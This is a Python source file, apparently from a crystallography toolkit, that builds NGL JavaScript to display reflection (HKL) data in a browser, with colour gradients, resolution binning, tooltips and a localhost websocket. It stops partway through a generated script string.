data = millarr.data()
if (isinstance(data, flex.int)):
data = [e for e in data if e!= display.inanval]
if millarr.is_complex_array():
data = flex.abs(millarr.data())
data = [e for e in data if not math.isnan(e)]
self.maxdata =max( data )
self.mindata =min( data )
self.maxsigmas = self.minsigmas = None
if millarr.sigmas() is not None:
data = millarr.sigmas()
data = [e for e in data if not math.isnan(e)]
self.maxsigmas =max( data )
self.minsigmas =min( data )
self.minmaxdata = (roundoff(self.mindata), roundoff(self.maxdata))
self.minmaxsigs = (roundoff(self.minsigmas), roundoff(self.maxsigmas))
self.labels = self.desc = ""
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if millarr.info():
self.labels = millarr.info().label_string()
if fomlabel:
self.labels = millarr.info().label_string() + " + " + fomlabel
self.desc = get_array_description(millarr)
self.span = ("?" , "?")
dmin = 0.0
dmax = 0.0
try:
self.span = ( millarr.index_span().min(), millarr.index_span().max())
dmin = millarr.d_max_min()[1]
dmax = millarr.d_max_min()[0]
except Exception as e:
mprint(to_str(e))
issymunique = millarr.is_unique_set_under_symmetry()
self.infotpl = (self.labels, self.desc, millarr.indices().size(), self.span,
self.minmaxdata, self.minmaxsigs, (roundoff(dmin), roundoff(dmax)), issymunique )
self.infostr = "%s (%s), %s HKLs: %s, MinMax: %s, MinMaxSigs: %s, d_minmax: %s, SymUnique: %d" %self.infotpl
def MakeHKLscene( proc_array, pidx, setts, mapcoef_fom_dict, merge, mprint=sys.stdout.write):
scenemaxdata =[]
scenemindata =[]
scenemaxsigmas = []
sceneminsigmas = []
scenearrayinfos = []
hklscenes = []
fomsarrays_idx = [(None, [])]
#mprint("in MakeHKLscene", verbose=True)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if proc_array.is_complex_array():
fomsarrays_idx.extend( mapcoef_fom_dict.get(proc_array.info().label_string()) )
settings = setts
if (settings.expand_anomalous or settings.expand_to_p1) \
and not proc_array.is_unique_set_under_symmetry() and not merge:
#settings = copy.deepcopy(settings)
settings.expand_anomalous = False
settings.expand_to_p1 = False
mprint("The " + proc_array.info().label_string() + \
" array is not symmetry unique and therefore won't be expanded")
for (fomsarray, fidx) in fomsarrays_idx:
hklscene = display.scene(miller_array=proc_array, merge=merge,
settings=settings, foms_array=fomsarray, fullprocessarray=True )
if not hklscene.SceneCreated:
mprint("The " + proc_array.info().label_string() + " array was not processed")
#return False
continue
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
# cast any NAN values to 1 of the colours and radii to 0.2 before writing javascript
if hklscene.SceneCreated:
hklscenes.append( hklscene)
b = flex.bool([bool(math.isnan(e[0]) + math.isnan(e[1]) + math.isnan(e[2])) for e in hklscene.colors])
hklscene.colors = hklscene.colors.set_selected(b, (1.0, 1.0, 1.0))
b = flex.bool([bool(math.isnan(e)) for e in hklscene.radii])
hklscene.radii = hklscene.radii.set_selected(b, 0.2)
fomslabel = None
if fomsarray:
fomslabel = fomsarray.info().label_string()
ainf = ArrayInfo(hklscene.work_array, fomlabel=fomslabel)
infostr = ainf.infostr
scenemaxdata.append( ainf.maxdata )
scenemindata.append( ainf.mindata )
scenemaxsigmas.append(ainf.maxsigmas)
sceneminsigmas.append(ainf.minsigmas)
scenearrayinfos.append((infostr, pidx, fidx))
#self.mprint("%d, %s" %(i, infostr) )
#i +=1
return (hklscenes, scenemaxdata, scenemindata, scenemaxsigmas, sceneminsigmas, scenearrayinfos)
def MakeTtips(hklscene, j):
tooltipstringsdict = {}
colstraliases = ""
if hklscene.isUsingFOMs():
return tooltipstringsdict, colstraliases # already have tooltips for the scene without the associated fom
colstraliases += "\n var st%d = '\\n%s: '" %(j, hklscene.work_array.info().label_string() )
ocolstr = hklscene.work_array.info().label_string()
if hklscene.work_array.is_complex_array():
ampl = flex.abs(hklscene.data)
phases = flex.arg(hklscene.data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
phases = phases.set_selected(b, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
sigmas = hklscene.sigmas
for i,datval in enumerate(hklscene.data):
od =""
if hklscene.work_array.is_complex_array():
od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
"\'+DGR+\'"
elif sigmas is not None:
od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
else:
od = str(roundoff(datval, 2))
if not (math.isnan( abs(datval) ) or datval == display.inanval):
hkl = hklscene.indices[i]
if not tooltipstringsdict.has_key(hkl):
spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
spbufttip += '\'+AA+\'' # javascript alias for angstrom
tooltipstringsdict[hkl] = spbufttip
# st1, st2,... are javascript aliases for miller array labelstrings as declared in colstraliases
tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
return tooltipstringsdict, colstraliases
class hklview_3d:
def __init__ (self, *args, **kwds) :
self.settings = kwds.get("settings")
self.miller_array = None
self.symops = []
self.sg = None
self.tooltipstrings = []
self.tooltipstringsdict = {}
self.d_min = None
self.scene = None
self.merge = False
self.NGLscriptstr = ""
self.camera_type = "orthographic"
self.primitivetype = "SphereBuffer"
self.script_has_tooltips = False
self.url = ""
self.binarray = "Resolution"
self.icolourcol = None
self.iradiicol = None
self.iarray = None
self.isnewfile = False
self.colstraliases = ""
self.binvals = []
self.workingbinvals = []
self.proc_arrays = []
self.HKLscenes = []
self.HKLscenesdict = {}
self.HKLscenesMaxdata = []
self.HKLscenesMindata = []
self.HKLscenesMaxsigmas = []
self.HKLscenesMinsigmas = []
self.sceneisdirty = True
self.hkl_scenes_info = []
self.match_valarrays = []
self.binstrs = []
self.mapcoef_fom_dict = {}
self.verbose = False
if kwds.has_key('verbose'):
self.verbose = kwds['verbose']
self.mprint = sys.stdout.write
if 'mprint' in kwds:
self.mprint = kwds['mprint']
self.nbin = 0
tempdir = tempfile.gettempdir()
self.hklfname = os.path.join(tempdir, "hkl.htm" )
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if 'htmlfname' in kwds:
self.hklfname = kwds['htmlfname']
self.hklfname = os.path.abspath( self.hklfname )
self.jscriptfname = os.path.join(tempdir, "hkljstr.js")
if os.path.isfile(self.jscriptfname):
os.remove(self.jscriptfname)
if 'jscriptfname' in kwds:
self.jscriptfname = kwds['jscriptfname']
self.mprint('Output will be written to \"%s\"\n' \
'including reference to NGL JavaScript \"%s\"' %(self.hklfname, self.jscriptfname))
self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
"""
self.htmldiv = """
<div id="viewport" style="width:100%; height:100%;"></div>
</body></html>
"""
self.colourgradientvalues = []
self.UseOSBrowser = True
if 'UseOSBrowser' in kwds:
self.UseOSBrowser = kwds['UseOSBrowser']
self.viewmtrxelms = None
self.HKLscenesKey = ( 0, False,
self.settings.expand_anomalous, self.settings.expand_to_p1 )
self.msgqueue = []
self.websockclient = None
self.lastmsg = "Ready"
self.browserisopen = False
self.msgdelim = ":\n"
self.msgqueuethrd = None
self.StartWebsocket()
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.server.shutdown()
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
def update_settings(self, diffphil, currentphil) :
if hasattr(diffphil, "filename") \
or hasattr(diffphil, "spacegroup_choice") \
or hasattr(diffphil, "merge_data") \
or hasattr(diffphil, "column") \
or hasattr(diffphil, "spacegroup_choice") \
or hasattr(diffphil, "using_space_subgroup") \
or hasattr(diffphil, "viewer") \
and ( \
hasattr(diffphil.viewer, "show_data_over_sigma") \
or hasattr(diffphil.viewer, "show_missing") \
or hasattr(diffphil.viewer, "show_only_missing") \
or hasattr(diffphil.viewer, "show_systematic_absences") \
or hasattr(diffphil.viewer, "slice_axis") \
or hasattr(diffphil.viewer, "slice_mode") \
or hasattr(diffphil.viewer, "slice_index") \
or hasattr(diffphil.viewer, "scale") \
or hasattr(diffphil.viewer, "nth_power_scale_radii") \
or self.settings.inbrowser==False and \
( hasattr(diffphil.viewer, "expand_anomalous") or \
hasattr(diffphil.viewer, "expand_to_p1") )\
or hasattr(diffphil.viewer, "show_anomalous_pairs") \
):
self.sceneisdirty = True
#if self.miller_array is None or self.iarray < 0 or self.isnewfile:
self.ConstructReciprocalSpace(currentphil, merge=self.merge)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
msg = ""
if self.iarray >=0:
self.scene = self.HKLscenes[self.iarray]
self.DrawNGLJavaScript()
msg = "Rendered %d reflections\n" % self.scene.points.size()
"""if self.settings.inbrowser and hasattr(diffphil, "viewer") and \
( hasattr(diffphil.viewer, "expand_anomalous") or \
hasattr(diffphil.viewer, "expand_to_p1") ):
"""
msg += self.ExpandInBrowser(P1= self.settings.expand_to_p1,
friedel_mate= self.settings.expand_anomalous)
return msg
def set_miller_array(self, col=None, merge=None, details=""):
if col is not None:
self.iarray = col
if self.iarray >= 0:
self.miller_array = self.HKLscenes[self.iarray].miller_array
self.scene = self.HKLscenes[self.iarray]
self.merge = merge
if (self.miller_array is None):
return
self.identify_suitable_fomsarrays()
self.d_min = self.miller_array.d_min()
array_info = self.miller_array.info()
self.sg = self.miller_array.space_group()
self.symops = self.sg.all_ops()
self.binvals = [ 1.0/self.miller_array.d_max_min()[0], 1.0/self.miller_array.d_max_min()[1] ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % self.miller_array.unit_cell().parameters()
self.mprint( "Data: %s %s, %d reflections in space group: %s, unit Cell: %s" \
% (array_info.label_string(), details, self.miller_array.indices().size(), \
self.miller_array.space_group_info(), uc) )
def MakeToolTips(self, HKLscenes):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
allcolstraliases = "var hk = \'H,K,L: \';\n"
alltooltipstringsdict = {}
if self.script_has_tooltips:
# large data sets will make javascript file very large with risk of crashing browser
self.mprint( "making tooltips")
tooltipstringsdict = {}
for j,hklscene in enumerate(HKLscenes):
#tooltipstringsdict, colstraliases = MakeTtips(hklscene, j)
#"""
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
colstraliases = "\n var st%d = '\\n%s: ';" %(j, hklscene.work_array.info().label_string() )
ocolstr = hklscene.work_array.info().label_string()
if hklscene.work_array.is_complex_array():
ampl = flex.abs(hklscene.data)
phases = flex.arg(hklscene.data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
phases = phases.set_selected(b, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
sigmas = hklscene.sigmas
for i,datval in enumerate(hklscene.data):
hkl = hklscene.indices[i]
if not tooltipstringsdict.has_key(hkl):
spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
spbufttip += '\'+AA+\'' # javascript alias for angstrom
tooltipstringsdict[hkl] = spbufttip
od =""
if hklscene.work_array.is_complex_array():
od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
"\'+DGR+\'"
elif sigmas is not None:
od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
else:
od = str(roundoff(datval, 2))
if not (math.isnan( abs(datval) ) or datval == display.inanval):
# st1, st2,... are javascript aliases for miller array labelstrings as declared in self.colstraliases
tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
#"""
alltooltipstringsdict.update( tooltipstringsdict )
allcolstraliases += colstraliases
allcolstraliases += "\n"
return alltooltipstringsdict, allcolstraliases
#def GetTooltipOnTheFly(self, hkl, rotmx=None, anomalous=False):
def GetTooltipOnTheFly(self, id, rotmx=None, anomalous=False):
hkl = self.scene.indices[id]
hklvec = flex.vec3_double( [(hkl[0], hkl[1], hkl[2])])
Rhkl = hklvec[0]
if rotmx:
Rhkl = hklvec[0] * rotmx
rothkl = Rhkl
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if anomalous:
rothkl = (-Rhkl[0], -Rhkl[1], -Rhkl[2])
spbufttip = '\'H,K,L: %d, %d, %d' %(rothkl[0], rothkl[1], rothkl[2])
# resolution and angstrom character
spbufttip += '\\ndres: %s \'+ String.fromCharCode(197) +\'' \
%str(roundoff(self.miller_array.unit_cell().d(hkl), 2) )
for hklscene in self.HKLscenes:
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
#datval = hklscene.work_array.data_at_first_index(hkl)
if id >= hklscene.data.size():
continue
datval = hklscene.data[id]
if datval and (not (math.isnan( abs(datval) ) or datval == display.inanval)):
if hklscene.work_array.is_complex_array():
ampl = abs(datval)
phase = cmath.phase(datval) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
# and replace the nan values with an arbitrary float value
if math.isnan(phase):
phase = 42.4242
# Cast negative degrees to equivalent positive degrees
phase = phase % 360.0
spbufttip +="\\n" + hklscene.work_array.info().label_string() + ': '
if hklscene.work_array.is_complex_array():
spbufttip += str(roundoff(ampl, 2)) + ", " + str(roundoff(phase, 1)) + \
"\'+ String.fromCharCode(176) +\'" # degree character
elif hklscene.work_array.sigmas() is not None:
sigma = hklscene.work_array.sigma_at_first_index(hkl)
spbufttip += str(roundoff(datval, 2)) + ", " + str(roundoff(sigma, 2))
else:
spbufttip += str(roundoff(datval, 2))
spbufttip += '\''
return spbufttip
def get_col_fomcol(self, idx):
if len(self.hkl_scenes_info) == 0:
return -1, -1
return self.hkl_scenes_info[idx][6], self.hkl_scenes_info[idx][7]
def ConstructReciprocalSpace(self, currentphil, merge=None):
self.mprint("Constructing HKL scenes")
#self.miller_array = self.match_valarrays[self.iarray]
#self.miller_array = self.proc_arrays[self.iarray]
self.HKLscenesKey = (currentphil.filename,
currentphil.spacegroup_choice,
currentphil.using_space_subgroup,
currentphil.merge_data,
#self.settings.expand_anomalous,
#self.settings.expand_to_p1,
self.settings.inbrowser,
self.settings.slice_axis,
self.settings.slice_mode,
self.settings.slice_index,
self.settings.show_missing,
self.settings.show_only_missing,
self.settings.show_systematic_absences,
self.settings.scale,
self.settings.nth_power_scale_radii
)
if self.HKLscenesdict.has_key(self.HKLscenesKey):
(
self.HKLscenes,
self.tooltipstringsdict,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenesdict[self.HKLscenesKey]
self.mprint("Scene key is already present", verbose=True)
#self.sceneisdirty = False
return True
HKLscenes = []
HKLscenesMaxdata = []
HKLscenesMindata = []
HKLscenesMaxsigmas = []
HKLscenesMinsigmas = []
hkl_scenes_info = []
tooltipstringsdict = {}
i = 0
# arguments tuple for multi_core_run
assert(self.proc_arrays)
argstuples = [ (e.deep_copy(), idx, copy.deepcopy(self.settings), self.mapcoef_fom_dict, merge, self.mprint) \
for (idx,e) in enumerate(self.proc_arrays)]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
"""
for (i, (args, res, errstr)) in enumerate( easy_mp.multi_core_run( MakeHKLscene, argstuples, 8)):
if errstr:
self.mprint(errstr)
(hkl_scenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = res
HKLscenesMaxdata.extend(scenemaxdata)
HKLscenesMindata.extend(scenemindata)
HKLscenesMaxsigmas.extend(scenemaxsigmas)
HKLscenesMinsigmas.extend(sceneminsigmas)
hkl_scenes_info.extend(scenearrayinfos)
HKLscenes.extend(hkl_scenes)
for inf in scenearrayinfos:
self.mprint("%d, %s" %(i, inf) )
i += 1
"""
for j,proc_array in enumerate(self.proc_arrays):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene(argstuples[j][0], argstuples[j][1], argstuples[j][2], argstuples[j][3], argstuples[j][4], argstuples[j][5] )
#) = MakeHKLscene(proc_array, copy.deepcopy(self.settings), self.mapcoef_fom_dict, merge)
HKLscenesMaxdata.extend(scenemaxdata)
HKLscenesMindata.extend(scenemindata)
HKLscenesMaxsigmas.extend(scenemaxsigmas)
HKLscenesMinsigmas.extend(sceneminsigmas)
hkl_scenes_info.extend(scenearrayinfos)
HKLscenes.extend(hklscenes)
#for inf in scenearrayinfos:
# self.mprint("%d, %s" %(i, inf) )
# i += 1
tooltipstringsdict, self.colstraliases = self.MakeToolTips(HKLscenes)
self.HKLscenesdict[self.HKLscenesKey] = (
HKLscenes,
tooltipstringsdict,
HKLscenesMaxdata,
HKLscenesMindata,
HKLscenesMaxsigmas,
HKLscenesMinsigmas,
hkl_scenes_info
)
(
self.HKLscenes,
self.tooltipstringsdict,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenesdict[self.HKLscenesKey]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.mprint("\nReflection data scenes:", verbose=True)
for j,inf in enumerate(hkl_scenes_info):
self.mprint("%d, %s" %(j, inf[0]), verbose=True)
self.sceneisdirty = True
return True
def identify_suitable_fomsarrays(self):
self.mprint("Matching complex arrays to suitable FOM arrays")
self.mapcoef_fom_dict = {}
for proc_array in self.proc_arrays:
fom_arrays_idx = []
for i,foms_array in enumerate(self.proc_arrays):
if not proc_array.is_complex_array() or not foms_array.is_real_array():
continue
if proc_array.size() != foms_array.size():
continue
if min(foms_array.data()) < 0.0 or max(foms_array.data()) > 1.0:
continue
fom_arrays_idx.append( (foms_array, i) )
self.mapcoef_fom_dict[proc_array.info().label_string()] = fom_arrays_idx
def UpdateBinValues(self, binvals = [] ):
if binvals:
self.binvals = binvals
else: # ensure default resolution interval includes all data by avoiding rounding errors
self.binvals = [ 1.0/(self.miller_array.d_max_min()[0]*1.001),
1.0/(self.miller_array.d_max_min()[1]*0.999) ]
def DrawNGLJavaScript(self):
if not self.scene or not self.sceneisdirty:
return
if self.miller_array is None :
self.mprint( "A miller array must be selected for rendering the reflections" )
return
self.mprint("Composing NGL JavaScript...")
h_axis = self.scene.axes[0]
k_axis = self.scene.axes[1]
l_axis = self.scene.axes[2]
nrefls = self.scene.points.size()
l1 = 110
l2= 115
Hstararrowstart = roundoff( [-h_axis[0]*l1, -h_axis[1]*l1, -h_axis[2]*l1] )
Hstararrowend = roundoff( [h_axis[0]*l1, h_axis[1]*l1, h_axis[2]*l1] )
Hstararrowtxt = roundoff( [h_axis[0]*l2, h_axis[1]*l2, h_axis[2]*l2] )
Kstararrowstart = roundoff( [-k_axis[0]*l1, -k_axis[1]*l1, -k_axis[2]*l1] )
Kstararrowend = roundoff( [k_axis[0]*l1, k_axis[1]*l1, k_axis[2]*l1] )
Kstararrowtxt = roundoff( [k_axis[0]*l2, k_axis[1]*l2, k_axis[2]*l2] )
Lstararrowstart = roundoff( [-l_axis[0]*l1, -l_axis[1]*l1, -l_axis[2]*l1] )
Lstararrowend = roundoff( [l_axis[0]*l1, l_axis[1]*l1, l_axis[2]*l1] )
Lstararrowtxt = roundoff( [l_axis[0]*l2, l_axis[1]*l2, l_axis[2]*l2] )
# make arrow font size roughly proportional to radius of highest resolution shell
#fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/3.0)))
fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/2.0)))
axisfuncstr = """
var MakeHKL_Axis = function()
{
// xyz arrows
shape.addSphere( [0,0,0] , [ 1, 1, 1 ], 0.3, 'Origo');
//blue-x
shape.addArrow( %s, %s , [ 0, 0, 1 ], 0.1);
//green-y
shape.addArrow( %s, %s , [ 0, 1, 0 ], 0.1);
//red-z
shape.addArrow( %s, %s , [ 1, 0, 0 ], 0.1);
shape.addText( %s, [ 0, 0, 1 ], %s, 'h');
shape.addText( %s, [ 0, 1, 0 ], %s, 'k');
shape.addText( %s, [ 1, 0, 0 ], %s, 'l');
};
""" %(str(Hstararrowstart), str(Hstararrowend), str(Kstararrowstart), str(Kstararrowend),
str(Lstararrowstart), str(Lstararrowend), Hstararrowtxt, fontsize,
Kstararrowtxt, fontsize, Lstararrowtxt, fontsize)
# Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
mincolourscalar = self.HKLscenesMindata[self.icolourcol]
maxcolourscalar = self.HKLscenesMaxdata[self.icolourcol]
if self.settings.sigma_color:
mincolourscalar = self.HKLscenesMinsigmas[self.icolourcol]
maxcolourscalar = self.HKLscenesMaxsigmas[self.icolourcol]
span = maxcolourscalar - mincolourscalar
ln = 60
incr = span/ln
colourgradarrays = []
val = mincolourscalar
colourscalararray =flex.double()
colourscalararray.append( val )
for j,sc in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
if self.HKLscenes[self.icolourcol].miller_array.is_complex_array():
# When displaying phases from map coefficients together with fom values
# compute colour map chart as a function of fom and phase values (x,y axis)
incr = 360.0/ln
val = 0.0
colourscalararray = flex.double()
colourscalararray.append( val )
for j in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
fomarrays = []
if self.HKLscenes[self.icolourcol].isUsingFOMs():
fomln = 50
fom = 1.0
fomdecr = 1.0/(fomln-1.0)
# make fomln fom arrays of size len(colourscalararray) when calling colour_by_phi_FOM
for j in range(fomln):
fomarrays.append( flex.double(len(colourscalararray), fom) )
fom -= fomdecr
for j in range(fomln):
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0), fomarrays[j] ) * 255.0)
else:
fomln =1
fomarrays = [1.0]
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0) ) * 255.0)
else:
fomln = 1
fomarrays = [1.0]
colourgradarrays.append(graphics_utils.color_by_property(
properties= flex.double(colourscalararray),
selection=flex.bool( len(colourscalararray), True),
color_all=False,
gradient_type= self.settings.color_scheme) * 255.0)
colors = self.HKLscenes[self.icolourcol].colors
radii = self.HKLscenes[self.iradiicol].radii
points = self.scene.points
hkls = self.scene.indices
dres = self.scene.dres
colstr = self.scene.miller_array.info().label_string()
data = self.scene.data
colourlabel = self.HKLscenes[self.icolourcol].colourlabel
fomlabel = self.HKLscenes[self.icolourcol].fomlabel
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
assert (colors.size() == radii.size() == nrefls)
colours = []
positions = []
radii2 = []
spbufttips = []
self.workingbinvals = []
if not self.binarray=="Resolution":
ibinarray= int(self.binarray)
self.workingbinvals = [ self.HKLscenesMindata[ibinarray] - 0.1 , self.HKLscenesMaxdata[ibinarray] + 0.1 ]
self.workingbinvals.extend( self.binvals )
self.workingbinvals.sort()
if self.workingbinvals[0] < 0.0:
self.workingbinvals.append(0.0)
self.workingbinvals.sort()
bindata = self.HKLscenes[ibinarray].data
if self.HKLscenes[ibinarray].work_array.is_complex_array():
bindata = self.HKLscenes[ibinarray].ampl
else:
self.workingbinvals = self.binvals
colstr = "dres"
bindata = 1.0/dres
self.nbin = len(self.workingbinvals)
for ibin in range(self.nbin):
colours.append([]) # colours and positions are 3 x size of data()
positions.append([])
radii2.append([])
spbufttips.append([])
def data2bin(d):
for ibin, binval in enumerate(self.workingbinvals):
if (ibin+1) == self.nbin:
return ibin
if d > binval and d <= self.workingbinvals[ibin+1]:
return ibin
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
raise Sorry("Should never get here")
for i, hklstars in enumerate(points):
# bin currently displayed data according to the values of another miller array
ibin = data2bin( bindata[i] )
positions[ibin].extend( roundoff(list(hklstars), 2) )
colours[ibin].extend( roundoff(list( colors[i] ), 2) )
radii2[ibin].append( roundoff(radii[i], 2) )
#spbufttips[ibin].append(self.tooltipstrings[i] )
spherebufferstr = ""
if self.script_has_tooltips:
spbufttips[ibin].append(self.tooltipstringsdict[hkls[i]])
else:
spbufttips[ibin].append( i )
spherebufferstr += self.colstraliases
negativeradiistr = ""
cntbin = 0
self.binstrs = []
for ibin in range(self.nbin):
mstr =""
nreflsinbin = len(radii2[ibin])
if (ibin+1) < self.nbin and nreflsinbin > 0:
bin1= self.workingbinvals[ibin]
bin2= self.workingbinvals[ibin+1]
if colstr=="dres":
bin1= 1.0/self.workingbinvals[ibin]
bin2= 1.0/self.workingbinvals[ibin+1]
mstr= "bin[%d] has %d reflections with %s in ]%2.3f; %2.3f]" %(cntbin, nreflsinbin, \
colstr, bin1, bin2)
self.binstrs.append(mstr)
self.mprint(mstr, verbose=True)
spherebufferstr += "\n// %s\n" %mstr
if self.script_has_tooltips:
uncrustttips = str(spbufttips[ibin]).replace('\"', '\'')
uncrustttips = uncrustttips.replace("\'\'+", "")
spherebufferstr += " ttips.push( %s );" %uncrustttips
else:
#spherebufferstr += " ttips.push( [ ] );"
ttlst = [-1]
ttlst.extend(spbufttips[ibin])
spherebufferstr += " ttips.push( %s );" %str( ttlst )
spherebufferstr += """
positions.push( new Float32Array( %s ) );
colours.push( new Float32Array( %s ) );
radii.push( new Float32Array( %s ) );
shapebufs.push( new NGL.%s({
position: positions[%d],
color: colours[%d], """ %(str(positions[ibin]), str(colours[ibin]), \
str(radii2[ibin]), self.primitivetype, cntbin, \
cntbin)
if self.primitivetype == "SphereBuffer":
spherebufferstr += "\n radius: radii[%d]," %cntbin
spherebufferstr += "\n picking: ttips[%d]," %cntbin
if self.primitivetype == "PointBuffer":
spherebufferstr += "\n }, {pointSize: %1.2f})\n" %self.settings.scale
else:
spherebufferstr += """\n })
//}, { disableImpostor: true // to enable changing sphereDetail
//, sphereDetail: 0 }) // rather than default value of 2 icosahedral subdivisions
//}, { disableImpostor: true }) // if true allows wireframe spheres but does not allow resizing spheres
);
"""
spherebufferstr += "shape.addBuffer(shapebufs[%d]);\n" %cntbin
if self.workingbinvals[ibin] < 0.0:
negativeradiistr += "shapebufs[%d].setParameters({metalness: 1});\n" %cntbin
cntbin += 1
spherebufferstr += """
// create tooltip element and add to the viewer canvas
stage.viewer.container.appendChild(tooltip);
// listen to `hovered` signal to move tooltip around and change its text
stage.signals.hovered.add(
function (pickingProxy)
{
tooltip.style.display = "none";
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' ))
{
var cp = pickingProxy.canvasPosition;
"""
if self.script_has_tooltips:
spherebufferstr += """
tooltip.innerText = pickingProxy.picker[pickingProxy.pid];
"""
else:
spherebufferstr += """
var sym_id = -1;
var hkl_id = -1
if (pickingProxy.picker.length > 0)
{ // get stored id number of symmetry operator applied to this hkl
sym_id = pickingProxy.picker[0];
var ids = pickingProxy.picker.slice(1);
var is_friedel_mate = 0;
hkl_id = ids[ pickingProxy.pid % ids.length ];
if (pickingProxy.pid >= ids.length)
is_friedel_mate = 1;
}
// tell python the id of the hkl and id number of the symmetry operator
mysocket.send( 'tooltip_id: [' + String([sym_id, hkl_id, is_friedel_mate]) + ']' );
if (current_ttip !== "" )
{
tooltip.innerText = current_ttip;
"""
spherebufferstr += """ tooltip.style.bottom = cp.y + 7 + "px";
tooltip.style.left = cp.x + 8 + "px";
tooltip.style.fontSize = "smaller";
tooltip.style.display = "block";
}
}
current_ttip = "";
}
);
"""
spherebufferstr += """
stage.signals.clicked.add(
function (pickingProxy)
{
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' ))
{
"""
if self.script_has_tooltips:
spherebufferstr += """
var innerText = pickingProxy.picker[pickingProxy.pid];
"""
else:
spherebufferstr += """
var innerText = pickingProxy.pid;
"""
spherebufferstr += """
mysocket.send( innerText);
}
}
);
"""
colourgradstrs = "colourgradvalarray = new Array(%s);\n" %fomln
# if displaying phases from map coefficients together with fom values then
for g,colourgradarray in enumerate(colourgradarrays):
self.colourgradientvalues = []
for j,e in enumerate(colourgradarray):
self.colourgradientvalues.append( [colourscalararray[j], e] )
self.colourgradientvalues = roundoff( self.colourgradientvalues )
fom = fomarrays[g]
colourgradstr = []
for j,val in enumerate(self.colourgradientvalues):
vstr = ""
alpha = 1.0
rgb = roundoff(val[1], 1)
gradval = "rgba(%s, %s, %s, %s)" %(rgb[0], rgb[1], rgb[2], alpha)
if j%10 == 0 or j==len(self.colourgradientvalues)-1 :
vstr = str( roundoff(val[0], 2) )
colourgradstr.append([vstr , gradval])
colourgradstrs += " colourgradvalarray[%s] = %s;\n" %(g, str(colourgradstr) )
#negativeradiistr = ""
#for ibin in range(self.nbin):
# if self.workingbinvals[ibin] < 0.0:
# negativeradiistr += "shapebufs[%d].setParameters({metalness: 1})\n" %ibin
self.NGLscriptstr = """
// Microsoft Edge users follow instructions on
// https://stackoverflow.com/questions/31772564/websocket-to-localhost-not-working-on-microsoft-edge
// to enable websocket connection
var pagename = location.pathname.substring(1);
var mysocket = new WebSocket('ws://127.0.0.1:7894/');
mysocket.onopen = function(e)
{
mysocket.send('%s now connected via websocket to ' + pagename + '\\n');
mysocket.send( 'Ready ' + pagename + '\\n');
};
mysocket.onclose = function(e)
{
mysocket.send('%s now disconnecting from websocket ' + pagename + '\\n');
mysocket.send( 'Ready ' + pagename + '\\n');
};
// Log errors to debugger of your browser
mysocket.onerror = function(error)
{
